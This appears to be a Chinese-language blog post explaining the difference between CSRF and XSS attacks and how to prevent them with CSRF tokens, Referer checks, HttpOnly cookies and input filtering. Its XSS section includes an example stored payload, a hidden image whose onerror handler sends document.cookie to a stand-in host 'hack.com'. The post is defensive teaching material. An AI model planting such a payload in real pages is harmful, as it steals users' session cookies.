CSRF和XSS区别和预防
名词解释
CSRF(Cross-site request forgery)跨站请求伪造
XSS (Cross-site scripting)跨站脚本攻击,这里缩写css被前端层叠样式表(Cascading Style Sheets)占用了,为了区分就叫了xss。
攻击手段描述
- CSRF
攻击场景描述:假设你登陆了a网站,此时你又打开了b网站的某个页面,b网站的某个页面上有一段代码,可能是一个自提交的表单,表单的action是a网站,这样b网站就模拟了你的身份,向a网站发送了一个请求。
CSRF的攻击特点是伪造其他网站的操作,冒用身份比如利用cookie伪造登录凭证,不是窃取cookie,
攻击可达到的后果:可以模拟你在a网站的所有操作,并且操作发生在你使用的浏览器,和你自己操作没有区别,比较著名的有利用gmailCSRF漏洞窃取用户邮件。
- XSS
攻击场景描述:属于注入攻击的一种。两个用户a和b,a在某网站上发表了一篇文章,其中包含了一串js代码,比如说代码如下:
<p>
这里显示摘要内容,用户可以输入各种文本及图片
<img style="display:none" src="null" onerror="a=function(ajax({url:'//hack.com/utm.gif',data:{c:document.cookie}}));a();"
</p>
如果网站没有做任何处理,直接存储发表了这个文章,用户b等查看这篇文章的时候,这段代码就可以在用户b没有感知的情况下,窃取到b的cookie并发送到a的服务器,以用于某些不良目的
攻击可达到的后果:窃取用户cookie,损害/控制用户电脑做出某些行为,模拟用户操作等。。xss的攻击如果成功,一般来说是可以造成很严重后果的,因为对方相当于直接控制了你的操作,并做出一些你自己不会做的事情,CSRF相对来说,只是模拟了操作,还是受到服务提供者限制的。
解决方案
- CSRF
对于跨站请求伪造,最重要的就是区分访问源头。因为发生在其他人的网站,防止攻击来源的产生是不可能的,只能从提升自己网站的甄别度来解决。
常用的解决方案:
- 有每一个表单都带有一个CSRF令牌(CSRF TOKEN),后端验证没有令牌的直接被拒绝,这里的令牌需要和会话绑定更能确保安全性,尤其是不要提供获取CSRF令牌的接口,否则就形同虚设了。
- 验证 HTTP Referer 字段
- 验证码(现在基本大型网站重要的操作都会进行验证,甚至是手机验证码验证来保障安全)
解释一下我博客园评论中雾林的问题:
这个csrf的令牌有啥用呢,现在laravel框架里每个页面都要求请求携带这个令牌,但是我要知道这个令牌,f12你的页面,就可以看到
令牌你可以看到,但是攻击者如果没有你的cookie,按照同源策略,另一个网站的攻击js脚本是获取不到你csrf令牌的,除非你给他看。一般来说你会把存有sessionId的cookie设置为http-only,这样js不可以获取到cookie,只能用由浏览器自动携带,也避免了cookie被盗用。所以从这两点上避免了被攻击。
- XSS
网站不应该信任用户输入的内容,应对用户输入内容进行处理,过滤任何有执行能力的脚本或者影响页面的CSS,保证其他用户访问页面的安全。具体针对每种语言都有相应的处理机制和工具。一般各种后端框架都封装或者提供相关插件处理。
-
给Cookie添加HttpOnly属性, 使cookie只能在http请求中传递, 像是上面那个脚本中 document.cookie无法获取到该Cookie值. 对XSS的攻击, 有一定的防御值. 但是对网络拦截, 还是泄露了.
-
在cookie中绑定用户网络信息等环境值,比如ip,user agent等,并在服务端校验. 这样当cookie被人劫持了, 并冒用, 但是在服务器端校验的时候, 发现校验值发生了变化, 一定程度上去规避cookie劫持
-
cookie中session id的定时更换, 可以一定程度减少攻击带来的损害,并不能避免攻击产生。